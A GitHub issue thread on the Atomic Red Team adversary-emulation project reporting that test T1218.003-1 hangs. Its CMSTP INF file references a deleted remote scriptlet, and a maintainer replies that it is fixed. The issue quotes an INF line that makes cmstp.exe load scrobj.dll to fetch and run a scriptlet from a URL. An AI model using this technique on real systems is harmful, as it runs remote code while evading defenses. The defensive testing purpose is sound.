### ISSUE TITLE
Problem: T1218.003-1 CMSTP Executing Remote Scriptlet Attempts to pull a file that no longer exists

### ISSUE THREAD

**Issue by davidmckennirey** [redcanaryco/atomic-red-team#1919]
## What did you do?

ℹ Please replace this with what you did.
Atomic test T1218.003-1 uses the cmstp.exe utlity to run the `atomics\T1218.003\src\T1218.003.inf` file. but within this file it references another file that no longer exists. Specifically,

```inf
[UnRegisterOCXSection]
%11%\scrobj.dll,NI,https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1191/src/T1191.sct
```

This URL returns a 404 because there is no T1191 anymore.

## What did you expect to happen?

Something to execute when the test is run.

## What happened instead?

The test just hangs for awhile, then finishes.

## Your Environment

* Which *specific* operating system are you running (e.g. Windows 7 SP1 32-bit)?
Windows 10 Pro 64bit
* Did you run the test from an elevated or root prompt?
Admin Powershell using Invoke-AtomicTest
* If relevant, which atomic test is this specific to?
T1218.003-1
* If relevant, which [execution harness](2) are you attempting to use?
N/A

**Comment by clr2of8** [comment]
should be fixed now. thx
